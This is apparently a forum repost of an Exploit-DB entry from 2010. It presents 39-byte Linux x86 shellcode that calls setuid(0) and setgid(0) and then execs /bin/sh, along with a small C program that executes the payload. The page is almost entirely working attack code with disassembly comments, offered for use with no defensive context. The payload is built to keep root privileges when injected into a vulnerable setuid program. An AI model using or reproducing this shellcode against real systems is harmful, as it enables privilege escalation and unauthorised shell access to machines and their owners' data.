Exploit Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13728
Проверка EDB
  1. Пройдено
Автор
GUNSLINGER_
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86
CVE
N/A
Дата публикации
2010-06-01
C:
/*
Name   : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date   : Tue Jun  1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>

char *shellcode=
		"\xeb\x19"                    /* jmp    0x804807b */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x17"                    /* mov    $0x17,%al */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x2e"                    /* mov    $0x2e,%al */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x0b"                    /* mov    $0xb,%al */
		"\x5b"                        /* pop    %ebx */
		"\x89\xd1"                    /* mov    %edx,%ecx */
		"\xcd\x80"                    /* int    $0x80 */
		"\xe8\xe2\xff\xff\xff"        /* call   0x8048062 */
		"\x2f"                        /* das     */
		"\x62\x69\x6e"                /* bound  %ebp,0x6e(%ecx) */
		"\x2f"                        /* das     */
		"\x73\x68"                    /* jae    0x80480ef */
		"";

int main(void)
{
		fprintf(stdout,"Length: %d\n",strlen(shellcode));
		((void (*)(void)) shellcode)();
		return 0;
}
 
Источник
www.exploit-db.com

Похожие темы